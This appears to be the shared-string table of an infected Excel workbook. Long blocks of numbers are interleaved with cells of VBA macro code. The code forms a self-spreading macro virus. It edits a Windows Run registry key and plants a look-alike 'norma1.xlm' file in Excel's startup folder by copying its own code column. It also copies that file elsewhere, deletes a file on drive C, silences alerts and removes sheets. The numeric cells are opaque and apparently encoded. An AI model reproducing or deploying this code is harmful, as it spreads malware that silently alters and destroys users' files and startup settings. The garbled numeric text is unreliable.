60 235 88 62 55 190 78 216 53 251 113 161 93 29 119 204 247 15 227 142 111 6 222 161 182 229 124 142 100 47 140 87 22 71 97 188 178 57 10 227 85 171 163 48 94 133 29 133 241 106 196 49 31 175 134 157 36 54 25 199 201 59 21 188 250 159 250 223 154 249 144 224 129 203 137 215 15 78 108 23 80 94 206 17 71 47 251 64 57 226 212 171 156 255 217 248 113 210 158 9 44 39 157 10 55 42 137 102 70 127 209 158 232 236 119 92 100 191 52 218 31 157 43 125 238 89 68 86 132 89 11 142 23 71 49 64 249 122 204 0 38 139 231 226 </t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">197 231 199 91 223 147 43 209 247 21 67 198 187 114 37 57 111 41 62 188 231 11 105 53 191 193 149 231 230 8 69 95 123 61 79 215 128 32 165 240 198 77 202 218 139 248 225 142 202 252 112 232 139 163 132 111 238 28 212 9 30 28 6 99 242 170 253 69 57 122 245 28 197 129 56 197 176 167 146 44 211 131 163 174 78 128 17 10 69 53 161 104 220 109 88 162 168 166 211 48 61 140 143 81 156 123 230 252 93 252 102 95 191 168 92 39 78 213 128 8 69 180 180 149 206 104 189 172 165 120 181 49 67 162 187 53 209 215 228 88 222 221 5 231 0 84 167 71 24 167 116 114 116 109 17 216 219 220 238 29 2 110 225 67 74 167 138 230 230 52 245 24 230 250 225 3 42 195 175 7 219 67 41 252 123 30 1 145 229 193 10 57 133 225 216 69 105 175 183 69 105 127 86 123 178 163 193 181 108 43 115 209 224 121 218 153 206 42 119 140 150 185 57 229 40 124 18 101 13 244 234 104 242 22 189 58 138 122 84 143 234 45 3 234 143 15 163 56 106 212 226 106 48 45 199 56 23 207 197 186 161 168 115 196 174 132 36 186 111 18 133 157 208 231 226 31 84 215 163 232 138 246 90 69 176 137 47 206 161 79 146 68 189 3 20 117 173 232 159 60 190 248 122 217 209 218 36 253 60 208 182 215 70 161 232 219 204 120 108 237 66 95 89 158 197 209 74 36 170 91 158 149 105 212 111 19 50 193 193 223 97 79 152 129 234 227 194 232 131 59 122 164 221 180 30 179 27 224 235 250 73 255 106 88 65 72 116 125 11 222 237 205 96 233 34 81 245 89 44 28 242 125 96 57 65 118 135 47 80 250 209 45 220 164 208 214 128 240 27 183 41 122 142 119 67 249 177 36 199 113 44 83 88 206 96 217 9 50 253 152 173 103 173 56 63 172 57 127 34 79 52 7 169 119 155 65 45 253 88 198 177 28 193 242 184 70 146 252 105 44 103 72 148 8 158 41 24 44 93 88 218 176 28 193 242 12 150 73 44 227 37 234 153 102 212 168 62 158 198 242 134 70 106 211 73 121 27 62 127 88 35 207 96 57 98 84 95 135 28 19 239 220 64 240 198 168 150 2 150 40 82 2 </t>
  </si>
  <si>
    <t xml:space="preserve">233 188 252 245 240 232 206 128 175 23 125 101 185 6 84 233 107 148 241 48 170 89 49 90 240 49 131 165 95 115 76 234 109 213 72 114 31 51 88 166 73 189 165 153 40 1 178 51 232 24 141 230 111 69 159 199 113 58 98 77 253 58 246 91 12 42 101 92 64 253 134 236 20 245 87 46 187 68 229 110 5 111 80 57 114 95 136 81 239 76 233 124 252 211 226 184 140 67 40 42 1 162 6 226 53 189 181 214 211 50 250 20 19 252 41 85 88 33 8 30 161 232 131 108 150 18 194 254 17 46 81 71 196 146 167 24 227 88 191 147 134 140 158 100 230 179 76 189 41 131 186 60 177 11 98 167 136 118 62 223 252 138 250 57 109 80 250 121 18 159 135 142 243 149 71 229 136 157 85 97 41 148 160 118 101 230 119 178 218 69 84 47 168 252 241 44 59 204 212 75 3 62 30 144 202 97 74 25 173 112 96 152 104 196 39 97 129 127 43 225 149 2 64 2 153 243 78 3 154 70 209 61 104 252 80 212 209 9 120 124 65 99 207 195 37 104 92 75 128 59 22 13 237 64 12 169 224 138 124 165 197 160 169 70 61 82 53 203 218 236 94 123 99 155 203 107 135 101 42 232 115 192 4 30 149 196 8 179 78 220 217 23 20 123 174 128 69 176 77 119 208 87 64 21 173 180 248 91 52 226 0 161 149 254 197 215 187 96 252 178 215 187 239 43 93 15 217 147 90 255 230 235 30 178 51 37 207 35 252 19 207 231 95 245 188 9 100 199 240 172 77 212 77 124 190 194 136 114 148 120 230 114 254 219 192 80 170 248 89 150 44 94 96 52 46 202 247 119 54 81 43 224 121 196 86 138 128 39 20 218 101 7 196 207 201 206 143 83 231 233 249 233 30 1 125 51 5 141 59 193 203 227 88 198 49 14 29 199 114 24 203 51 88 142 148 102 236 111 22 71 33 101 231 79 98 57 161 201 159 204 146 231 160 21 191 123 249 87 55 79 37 25 48 32 107 108 57 76 99 193 169 179 239 95 57 251 198 196 71 23 46 159 30 123 231 237 243 159 158 61 253 218 199 111 93 71 199 175 95 190 252 193 248 95 78 95 68 26 157 128 88 114 144 42 133 51 62 75 81 208 243 80 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">158 44 24 76 153 246 143 1 42 231 104 144 145 170 6 117 208 14 242 149 170 80 149 82 70 14 102 176 86 94 158 175 77 255 141 250 51 120 51 131 251 41 142 239 39 77 112 205 132 252 158 164 236 225 200 243 187 25 227 132 57 195 70 192 192 217 234 156 172 83 229 240 234 44 236 161 99 122 244 9 122 69 235 23 233 213 169 99 24 241 104 189 71 168 208 147 183 227 227 38 5 87 80 148 69 198 47 19 163 18 199 22 188 103 45 75 141 96 2 183 136 235 99 160 30 254 234 53 165 171 193 221 122 10 158 99 211 175 0 126 216 79 43 64 128 214 201 136 176 39 20 233 225 119 199 250 162 80 139 208 156 96 151 199 191 21 247 3 218 133 157 193 65 204 5 20 64 4 48 196 10 116 248 190 60 248 136 146 113 218 128 215 7 115 235 22 51 154 23 21 118 159 73 124 103 132 237 103 50 107 126 184 96 158 99 227 233 123 61 31 27 79 42 109 31 70 28 60 19 30 159 68 249 129 109 239 122 239 122 143 115 29 112 184 235 221 182 245 238 122 96 183 221 227 170 119 223 235 4 174 122 155 203 102 115 120 18 78 231 189 118 207 234 33 243 62 1 19 242 252 166 221 64 8 121 36 74 52 141 203 132 60 62 154 16 242 136 227 132 144 231 76 185 87 64 108 60 146 88 185 164 3 32 54 30 68 198 99 65 108 60 139 170 189 49 137 65 100 60 223 45 109 110 141 129 174 64 95 55 179 21 246 164 191 121 64 12 70 37 166 211 29 14 51 110 74 15 76 190 36 226 215 41 241 39 202 120 240 115 240 152 47 210 34 6 194 27 169 117 96 91 189 221 108 52 27 143 180 38 154 18 110 196 217 163 91 6 118 108 22 247 32 178 33 208 5 113 136 243 12 62 54 226 11 48 91 129 73 98 138 140 163 86 179 113 227 206 68 9 127 248 61 91 135 191 79 122 218 124 168 100 75 68 167 91 216 142 92 127 137 163 237 214 162 10 22 41 133 5 105 133 142 130 166 102 97 58 252 34 120 164 57 222 71 69 117 15 32 114 156 30 38 140 200 113 54 85 28 46 55 47 180 50 188 55 20 30 124 231 118 179 209 0 87 12 27 150 32 94 159 165 198 </t>
  </si>
  <si>
    <t>thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t xml:space="preserve">208 166 5 116 195 115 149 53 75 3 177 254 153 160 196 57 222 93 86 126 247 239 140 30 238 128 251 46 9 177 236 192 59 3 141 77 172 60 165 200 44 223 108 29 211 6 196 157 98 68 234 8 181 181 192 89 36 81 220 84 243 251 135 106 60 203 168 98 121 62 41 245 46 75 244 247 134 34 131 192 248 168 4 200 156 66 139 61 66 241 195 190 238 72 8 116 12 134 197 198 166 120 32 225 13 245 247 251 130 61 135 54 92 243 93 250 73 71 36 150 120 67 183 61 49 164 127 228 64 115 212 35 238 12 69 68 147 55 32 156 109 59 84 199 120 125 150 96 183 24 112 159 132 160 109 9 136 190 32 24 222 18 100 20 166 163 148 83 138 93 21 62 221 44 198 163 39 159 123 225 16 109 58 220 196 208 1 191 79 146 46 87 173 117 55 186 117 93 165 211 20 91 116 253 193 110 191 78 120 242 97 169 215 19 138 115 128 85 192 148 77 49 43 25 119 119 180 51 88 186 21 172 132 75 122 4 167 128 224 41 32 128 74 93 191 170 83 240 148 62 125 49 85 59 208 245 184 40 209 155 67 244 183 107 153 129 174 230 198 56 56 208 127 48 248 215 238 159 149 13 116 125 178 142 246 46 62 172 107 98 94 106 40 219 145 126 234 246 235 197 155 67 47 221 38 80 27 131 237 85 209 8 39 44 185 218 92 199 176 128 103 173 136 213 200 182 116 5 45 50 163 119 254 195 120 240 68 59 156 176 123 30 20 7 37 134 221 91 5 93 193 3 167 132 98 175 223 7 130 189 50 139 185 27 116 119 139 146 196 196 3 160 77 244 245 108 9 6 6 129 217 184 33 212 17 98 118 127 30 235 235 188 71 140 252 13 108 168 16 152 253 21 246 26 216 184 232 155 223 111 254 33 191 14 244 249 2 161 94 137 139 63 27 88 174 107 79 187 220 146 21 196 77 161 61 79 47 73 173 98 161 141 127 36 129 187 154 56 118 201 181 69 190 209 19 175 46 210 245 172 48 27 125 246 70 179 113 118 41 107 102 63 46 249 173 105 191 35 116 98 127 89 172 108 234 170 45 177 40 81 246 241 134 75 79 184 83 47 235 22 235 103 199 174 141 41 142 255 191 122 133 87 </t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <t xml:space="preserve">204 43 95 189 206 94 253 99 247 6 175 126 225 190 131 190 23 118 92 74 63 194 66 40 153 134 88 34 184 250 95 254 53 83 118 240 123 107 129 249 202 14 93 201 172 105 95 247 129 133 109 29 157 145 190 126 238 161 54 176 73 239 5 112 69 42 113 171 86 215 89 24 167 149 159 216 21 19 173 186 180 227 1 134 69 216 245 29 254 205 138 151 13 150 221 147 156 52 18 31 12 187 3 98 100 36 250 202 250 31 23 177 186 63 236 178 242 50 165 212 123 66 135 157 74 214 38 7 194 225 89 250 51 122 246 71 247 89 22 235 130 201 59 91 245 87 215 184 239 159 149 118 204 74 246 225 122 195 107 171 47 174 92 159 216 218 247 248 72 145 157 233 92 83 185 89 2 82 236 173 96 199 182 207 134 36 174 239 207 131 19 79 124 190 203 254 122 121 185 113 35 117 229 190 71 217 232 130 217 35 69 110 122 213 146 133 174 138 133 250 206 247 239 157 26 250 92 226 166 42 167 134 208 207 210 103 238 120 230 147 169 161 242 103 223 91 224 13 85 238 125 242 200 69 106 255 121 106 106 40 189 7 229 86 254 224 79 67 174 41 165 100 234 249 8 103 190 214 228 88 179 244 151 63 253 108 237 243 247 39 78 218 118 181 139 81 19 179 71 88 222 246 11 113 75 215 83 64 236 142 114 44 92 161 39 240 18 189 115 181 131 237 164 196 184 112 132 61 203 118 175 106 220 190 170 136 111 213 217 206 237 225 147 109 177 32 83 73 165 162 204 129 129 132 215 31 225 156 171 172 201 237 187 109 13 235 99 129 200 249 9 16 213 213 185 24 91 29 189 187 218 48 218 229 239 163 131 189 113 211 173 211 99 253 223 255 251 55 79 8 103 195 248 54 0 128 67 75 220 61 11 120 20 229 181 255 206 78 146 77 8 16 32 96 128 16 192 152 38 34 224 238 38 196 4 40 154 39 65 67 2 73 128 180 6 179 175 217 236 146 217 157 237 236 108 30 202 133 160 160 84 107 109 109 125 92 172 138 104 125 85 124 163 96 171 60 228 90 172 124 92 236 245 83 110 189 126 133 214 235 5 175 90 169 168 81 146 157 123 206 63 255 236 108 50 81 1 191 222 246 222 205 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">55 249 223 231 63 231 252 231 127 157 255 159 57 201 246 15 75 207 209 254 225 217 218 31 68 67 28 139 70 155 237 47 94 114 142 245 219 152 237 194 51 173 31 117 137 151 91 244 250 87 146 74 82 1 238 50 192 162 145 92 78 106 72 21 181 228 119 198 246 47 207 218 254 36 218 0 92 48 93 243 251 72 144 200 223 66 200 108 64 127 26 179 203 120 166 245 227 247 65 255 43 241 201 82 203 106 205 189 144 185 143 176 67 130 32 179 208 185 36 155 217 17 155 202 236 152 177 251 155 175 50 247 41 221 46 96 62 179 63 198 194 75 24 60 55 115 211 235 146 237 255 113 100 23 179 87 246 122 234 80 251 101 72 197 134 84 189 165 56 106 213 113 102 26 251 24 42 131 176 36 205 252 157 90 253 135 182 121 208 18 85 58 251 112 246 125 172 140 195 102 46 99 37 211 82 181 183 121 206 79 213 190 62 54 61 85 251 234 214 94 139 102 213 208 194 105 110 5 115 255 55 78 144 50 65 170 145 192 113 12 135 26 230 246 50 247 95 153 59 150 225 212 200 220 91 152 43 130 155 141 254 116 49 147 12 244 247 168 36 202 43 42 154 7 68 45 150 168 168 124 68 77 129 37 49 71 180 136 136 122 218 62 216 159 163 242 173 106 81 155 10 107 103 94 164 185 81 7 98 19 213 209 62 252 14 108 171 186 170 76 229 201 252 58 53 133 172 62 125 113 145 122 122 186 77 85 167 58 121 162 168 17 245 66 158 136 106 171 90 202 147 50 53 71 205 93 15 44 157 0 124 252 254 215 129 92 222 170 14 74 101 106 1 108 164 41 212 2 158 215 209 162 217 120 86 51 81 227 119 66 67 144 11 129 50 149 87 137 58 175 76 37 142 1 127 29 20 253 122 140 227 119 165 17 134 25 113 178 58 190 169 4 159 40 113 117 81 157 202 209 18 243 219 104 209 145 75 108 41 83 231 2 118 5 69 71 227 152 27 136 249 56 254 181 196 108 177 209 2 131 247 50 178 108 180 58 36 140 178 207 166 146 58 168 208 70 10 230 231 168 163 224 255 209 120 6 41 136 239 221 19 199 38 213 177 200 212 176 136 63 58 137 236 96 195 159 102 194 48 133 189 186 </t>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t xml:space="preserve">48 69 84 201 184 83 154 173 72 44 240 48 21 154 9 218 152 113 16 228 163 104 136 61 200 172 196 153 159 102 3 210 158 100 19 81 1 126 69 224 17 33 190 21 30 94 69 165 184 21 112 229 72 17 60 54 120 246 88 217 247 135 19 50 71 77 95 206 249 70 193 99 2 148 187 136 137 76 218 41 178 17 191 24 194 135 13 220 209 202 77 103 88 29 236 175 87 7 62 107 83 201 88 190 77 29 240 215 171 171 79 23 231 94 207 145 54 168 132 47 83 83 50 201 5 163 201 232 58 52 185 94 166 85 89 120 60 94 104 83 11 139 212 79 209 62 236 212 243 17 135 89 249 17 117 234 28 50 171 118 161 122 213 4 146 77 6 131 7 226 3 159 29 137 51 68 166 148 169 165 54 178 80 45 130 134 56 30 39 19 248 35 241 248 222 122 21 121 143 213 125 64 0 67 21 49 164 216 234 201 105 44 185 199 66 46 162 246 58 135 210 61 53 155 124 74 191 245 60 72 157 55 47 86 212 220 42 139 185 125 172 19 242 186 112 71 153 85 184 80 157 58 145 100 76 130 54 154 183 80 37 185 154 201 207 28 181 160 176 94 45 248 20 249 140 101 232 59 136 41 121 239 113 212 80 150 142 75 42 195 101 3 119 198 184 84 115 164 107 88 174 243 128 67 69 106 1 2 76 161 114 183 63 110 240 56 151 241 248 136 37 135 216 246 199 227 219 22 170 154 248 12 126 50 153 76 222 19 183 237 129 56 27 61 164 179 144 129 149 47 67 29 208 123 203 212 253 241 61 241 210 84 198 221 220 5 156 193 203 188 74 36 33 37 111 133 70 203 216 4 95 238 180 208 47 81 158 57 63 184 188 119 17 194 153 146 254 28 167 181 228 89 85 65 150 175 207 34 167 200 43 131 253 253 113 96 76 81 61 29 81 202 140 241 161 140 117 247 253 241 85 11 113 212 204 73 140 154 133 56 106 94 200 83 102 64 127 95 168 246 199 115 235 172 100 156 216 163 14 254 162 76 205 42 129 37 5 200 32 212 49 66 239 229 217 155 19 191 129 190 102 31 210 127 115 136 254 209 111 173 255 30 129 209 162 13 164 118 164 126 92 6 233 251 227 86 178 7 158 133 73 125 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t xml:space="preserve">248 56 148 89 107 213 172 78 252 253 231 142 226 162 28 128 199 3 131 79 197 1 40 147 188 195 40 121 34 218 198 157 74 196 83 241 193 96 157 10 35 93 60 240 70 124 147 133 92 138 3 65 171 58 240 97 255 8 37 170 161 4 96 146 144 133 92 114 218 142 114 169 213 142 61 247 82 254 247 113 202 241 111 132 65 7 164 223 199 79 169 175 232 197 161 219 94 106 72 12 76 77 133 109 116 122 250 122 56 104 236 76 159 110 82 242 54 89 168 236 143 2 154 227 235 222 136 63 75 206 112 254 60 16 103 115 219 193 120 242 148 115 48 174 113 255 64 60 105 254 60 24 63 16 255 7 157 63 31 166 243 39 16 179 51 254 181 196 140 60 127 34 97 230 249 51 29 254 63 172 205 159 155 207 126 254 28 54 10 145 9 14 182 230 230 45 57 214 146 33 253 47 151 217 22 198 223 187 80 211 27 240 244 195 243 77 115 233 65 232 131 7 226 67 231 82 59 179 207 60 240 138 182 98 61 156 174 175 245 181 248 100 139 48 201 118 156 39 193 178 175 12 118 2 22 102 189 121 33 117 45 204 229 152 107 213 172 170 175 215 202 124 147 253 230 212 33 247 124 234 40 141 179 201 46 182 2 197 149 51 79 138 200 80 251 205 227 44 198 90 34 111 218 73 182 178 40 33 95 232 107 106 40 101 3 40 51 70 44 53 115 196 210 249 179 73 57 91 222 114 180 82 59 185 224 12 42 157 77 122 89 41 43 45 85 66 134 110 213 70 46 133 42 222 189 204 111 228 182 94 198 1 161 211 94 103 9 101 195 12 84 159 219 207 242 231 167 250 44 236 214 149 125 22 199 253 36 157 68 178 83 97 66 184 150 35 190 135 173 60 201 128 58 87 86 86 44 147 165 53 194 102 175 146 130 251 161 203 184 236 53 169 92 198 119 185 140 52 78 182 100 219 82 82 199 167 115 227 233 245 169 159 147 76 238 242 133 28 76 99 22 185 47 170 248 36 81 88 196 77 38 81 162 192 86 83 34 125 34 17 64 66 252 164 128 107 35 214 89 109 139 43 34 145 118 246 157 247 78 77 209 72 77 37 46 110 119 145 233 124 133 246 169 116 212 228 142 148 105 254 29 46 </t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t xml:space="preserve">98 197 76 187 21 23 172 201 16 20 83 228 98 198 43 242 92 132 227 87 121 54 1 168 81 125 184 96 180 144 164 228 159 78 115 145 9 44 122 4 216 179 22 184 72 22 159 140 29 42 92 159 73 113 145 204 97 133 48 254 216 159 0 147 204 61 71 29 49 217 69 82 248 42 209 29 141 78 249 181 139 88 248 30 41 203 69 50 104 17 85 109 175 108 239 114 203 237 205 130 178 254 39 0 158 1 170 10 184 117 181 34 213 42 182 62 163 151 176 144 30 81 215 47 78 126 207 32 67 139 165 54 21 211 67 46 16 174 38 65 148 220 190 194 19 64 49 233 14 255 20 40 78 31 90 101 119 184 252 148 139 140 97 229 87 68 124 110 69 168 149 165 16 214 122 223 36 83 246 198 112 233 39 46 50 154 101 175 14 70 35 162 187 23 53 125 74 244 212 103 64 33 161 90 87 247 165 46 24 11 154 133 48 213 148 54 228 25 36 53 9 107 4 175 82 33 138 26 109 209 213 191 195 156 126 168 76 2 110 205 56 2 205 53 180 66 61 169 104 43 146 19 237 141 42 66 200 125 159 142 66 34 155 150 240 218 84 200 196 106 210 180 240 25 16 99 37 21 62 223 231 50 178 160 194 183 174 13 176 76 206 114 229 155 122 203 25 205 128 241 117 91 92 132 215 27 66 138 244 190 178 27 33 129 175 126 61 98 130 81 171 60 119 110 64 65 19 122 132 203 110 50 53 38 196 46 175 211 155 38 17 235 233 85 132 191 0 132 52 158 221 198 72 45 69 184 254 168 244 254 45 128 8 161 167 31 168 105 4 54 245 223 8 130 66 186 67 89 200 163 80 175 95 18 125 130 188 161 5 154 139 52 71 4 111 208 45 214 210 168 168 109 3 22 213 210 133 158 96 84 137 62 152 129 49 94 10 76 139 255 96 187 9 67 168 244 116 61 196 82 254 107 229 30 195 186 134 73 200 164 109 128 161 222 126 177 112 251 97 61 139 133 212 198 68 17 47 200 29 190 7 40 34 64 49 66 202 123 71 23 168 100 94 96 202 182 163 136 21 246 139 22 161 71 65 17 123 232 5 172 191 86 146 81 102 131 32 17 229 192 117 138 79 193 199 38 222 97 116 211 10 19 </t>
  </si>
  <si>
    <t>for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <t xml:space="preserve">130 254 212 109 216 182 66 207 119 86 155 228 85 232 57 116 210 104 240 42 84 95 79 185 25 185 186 198 109 166 116 77 198 54 35 239 74 183 24 19 222 189 194 36 144 122 59 100 204 70 146 169 184 55 72 211 238 6 96 188 110 95 245 203 191 0 81 188 24 65 63 114 231 159 157 64 54 132 155 4 204 81 25 243 251 15 191 79 243 215 54 183 52 173 168 106 9 1 247 82 249 238 102 165 87 20 182 220 140 41 157 130 28 22 196 98 103 251 47 129 34 62 97 35 245 196 119 112 16 9 160 55 63 23 243 137 17 132 38 200 139 110 119 145 137 124 184 33 22 242 8 114 163 191 18 132 44 218 34 209 114 143 129 124 79 130 140 67 210 48 69 17 194 173 229 26 98 141 93 130 44 186 35 17 193 23 202 67 212 27 87 214 52 213 87 44 91 86 83 189 35 27 90 129 79 50 82 251 189 1 148 221 128 38 160 183 143 55 245 29 138 92 227 81 163 239 52 7 175 22 62 58 141 173 28 237 70 124 176 17 15 29 50 181 45 102 155 234 70 242 68 244 110 147 32 7 241 98 189 48 80 248 4 113 53 128 24 63 180 72 82 234 162 119 112 236 193 190 21 125 124 189 169 201 116 46 253 54 100 66 151 86 118 75 49 242 223 75 57 179 254 67 100 128 191 54 216 35 248 96 120 235 108 253 5 242 57 92 35 203 85 146 79 40 232 130 246 216 104 3 8 86 24 202 162 130 220 37 248 28 95 92 99 142 116 126 121 13 194 137 94 189 204 173 4 80 6 226 99 1 45 2 45 222 190 180 162 117 89 69 75 93 67 197 210 154 102 1 169 196 163 182 101 114 176 11 186 234 107 128 9 207 71 21 57 182 102 30 52 219 176 177 119 104 225 247 26 76 76 196 130 111 110 193 217 77 20 167 93 133 136 47 9 43 32 74 110 241 131 1 108 105 61 84 23 236 8 60 159 14 68 83 172 45 68 242 251 97 52 58 254 40 109 123 234 199 28 23 172 70 182 104 39 168 157 55 33 98 18 200 201 134 66 28 127 180 145 69 129 94 140 237 121 253 139 192 1 218 107 105 155 236 108 215 7 252 33 93 151 166 13 6 176 175 122 122 159 109 51 229 129 81 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">90 134 89 174 209 127 199 127 211 161 54 32 95 177 14 229 134 37 67 184 109 1 246 185 38 1 38 29 175 224 31 131 129 80 180 195 35 245 116 231 254 208 52 230 176 148 173 63 66 220 162 1 73 86 194 208 14 185 178 169 222 68 218 209 78 148 34 26 236 30 109 18 21 26 127 255 235 88 105 135 64 201 182 205 71 208 24 160 35 66 248 61 125 248 49 214 0 209 202 15 96 174 226 53 118 121 221 30 44 118 195 111 17 6 11 244 110 199 58 155 97 57 163 220 124 33 142 125 48 163 6 115 167 155 155 22 162 55 111 196 217 198 45 203 163 98 166 177 28 98 115 157 200 54 111 192 49 107 157 230 113 94 196 60 197 179 153 167 100 14 243 204 155 203 60 165 23 51 207 37 118 230 41 115 48 79 185 115 29 34 4 0 237 207 223 198 124 142 157 186 207 185 235 54 211 44 188 162 82 138 133 125 111 251 76 109 193 136 93 123 31 182 167 15 15 2 233 56 208 120 55 2 195 179 195 29 157 56 199 121 97 82 197 248 129 7 113 136 246 126 63 11 103 90 237 162 195 31 143 152 106 211 18 150 52 35 182 62 73 121 100 163 137 105 8 121 230 235 198 242 168 89 113 203 74 44 130 125 50 120 74 103 33 151 184 220 32 68 173 184 22 34 13 20 112 11 187 97 240 131 199 140 193 12 75 58 215 163 4 71 165 124 243 98 42 42 189 6 171 163 44 20 137 168 54 65 107 146 177 188 13 7 205 253 247 239 62 241 212 135 142 103 61 70 192 185 35 41 80 252 92 82 160 228 249 164 192 188 157 73 129 210 93 73 129 75 94 240 96 119 119 59 58 177 10 29 75 89 2 97 83 222 242 39 173 134 220 93 66 69 212 191 128 10 27 250 221 175 26 249 171 181 211 231 27 127 103 44 4 123 68 45 82 43 119 250 157 164 241 60 32 117 143 253 212 152 39 113 112 139 30 218 109 44 127 155 244 123 7 142 42 199 14 175 177 86 168 2 94 226 141 3 236 249 122 55 161 119 13 112 252 235 186 222 136 236 17 241 206 193 65 119 136 238 114 120 216 84 226 102 247 97 171 37 201 48 51 26 255 250 146 190 55 176 120 136 53 221 18 82 67 106 </t>
  </si>
  <si>
    <t>ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t xml:space="preserve">191 133 53 221 124 112 231 66 40 159 148 195 83 69 230 67 13 218 249 219 98 248 95 65 214 17 7 196 84 65 120 41 252 53 146 6 22 179 148 44 129 88 204 215 204 98 180 211 59 221 45 101 190 26 240 205 37 213 164 30 254 242 33 38 8 27 160 24 113 19 17 54 118 149 224 70 33 198 11 254 90 216 18 201 224 86 144 8 252 137 52 214 13 91 165 32 196 135 233 29 199 164 157 182 197 204 7 180 42 92 252 173 248 224 0 60 139 193 181 39 241 65 134 218 59 224 191 155 132 40 142 65 130 187 182 40 165 31 49 196 244 40 60 126 192 116 6 240 2 95 125 9 82 243 133 109 195 66 53 164 21 160 214 0 23 202 161 158 70 112 43 161 158 145 160 212 144 30 90 6 57 84 78 219 6 33 123 200 26 136 243 210 28 245 80 202 67 177 146 73 239 16 206 236 28 81 66 138 135 241 227 108 57 227 100 18 98 112 102 21 180 126 3 252 181 128 63 10 56 224 166 86 0 30 21 67 222 182 196 22 23 121 133 101 21 240 121 160 44 82 93 67 219 56 6 113 18 228 55 90 56 249 151 145 104 95 39 72 78 45 180 109 53 197 166 10 240 156 7 124 51 172 40 161 141 164 57 240 84 3 220 121 140 138 10 106 105 201 78 173 18 105 241 206 4 21 142 191 89 251 134 104 62 108 47 31 192 16 191 162 109 147 203 156 125 235 82 133 60 207 19 158 35 36 149 179 16 180 123 152 1 110 22 55 244 196 91 123 123 235 236 79 59 147 85 44 24 50 255 186 98 28 201 129 86 15 208 126 188 138 246 217 78 192 86 130 191 78 146 61 162 57 81 85 157 200 125 117 25 85 69 99 246 84 231 194 37 89 62 29 24 139 1 158 92 179 214 65 193 150 141 0 118 47 167 165 171 234 147 63 100 186 35 6 2 65 145 27 151 99 0 223 66 178 88 34 220 223 255 141 79 251 63 0 14 255 95 126 228 92 120 41 175 189 189 117 207 210 250 199 187 199 197 123 182 157 159 167 73 188 246 213 121 212 178 238 172 253 205 196 27 6 231 206 209 123 210 219 79 62 37 220 51 101 122 253 182 192 230 252 237 247 215 247 235 249 245 119 71 182 183 150 </t>
  </si>
  <si>
    <t xml:space="preserve">95 249 174 237 228 150 228 175 192 230 36 89 62 210 52 184 229 220 149 22 149 60 214 172 157 9 165 247 101 227 113 45 73 172 252 169 62 148 69 186 195 189 168 235 229 244 60 48 233 141 131 85 136 22 194 189 26 106 184 83 18 97 216 175 19 242 221 68 233 234 96 136 222 210 208 131 18 129 81 78 47 45 184 189 1 106 47 88 15 139 81 128 214 152 8 215 244 4 21 66 150 19 75 95 22 13 3 94 77 137 170 240 158 42 228 110 73 84 229 151 100 66 174 98 133 45 100 177 164 72 120 125 71 175 122 9 148 246 36 66 65 24 219 99 132 223 152 67 67 168 156 195 15 9 234 21 215 75 225 14 2 195 156 17 150 34 132 92 151 168 42 44 116 19 178 41 17 108 144 0 205 235 97 29 151 8 6 130 8 224 134 4 128 134 152 8 108 185 13 214 129 90 120 89 12 175 198 18 114 119 34 6 24 31 11 1 61 15 36 160 54 11 0 245 9 35 24 243 16 242 116 2 34 218 119 36 228 153 4 65 72 236 179 70 170 28 3 88 47 37 152 181 42 0 203 121 66 246 194 90 155 69 4 21 118 39 151 144 125 137 108 84 51 144 146 89 211 227 21 196 190 139 80 101 186 178 178 226 243 63 161 58 96 85 48 236 40 221 187 142 121 139 157 105 235 113 19 4 11 199 103 158 198 45 41 228 43 221 158 143 169 187 30 120 230 160 35 2 59 167 212 76 77 189 252 51 23 44 241 51 117 21 181 87 121 105 55 166 193 254 54 232 21 38 194 14 42 243 71 69 180 193 240 242 174 190 95 91 251 103 99 29 218 94 211 229 22 99 176 106 205 249 119 220 8 83 173 160 227 248 148 132 223 121 194 240 23 191 15 126 27 219 78 235 192 58 115 112 239 167 135 232 203 30 119 29 195 45 141 118 191 245 142 38 170 220 209 237 164 238 141 27 27 149 36 253 246 47 103 185 72 118 210 218 155 217 4 213 77 130 202 247 22 25 197 180 52 216 229 40 194 218 143 140 245 61 43 114 191 207 88 140 183 87 11 126 119 76 84 214 236 51 178 225 101 99 143 40 60 247 111 6 64 118 249 23 109 138 102 228 226 94 13 173 135 190 117 181 11 186 115 31 </t>
  </si>
  <si>
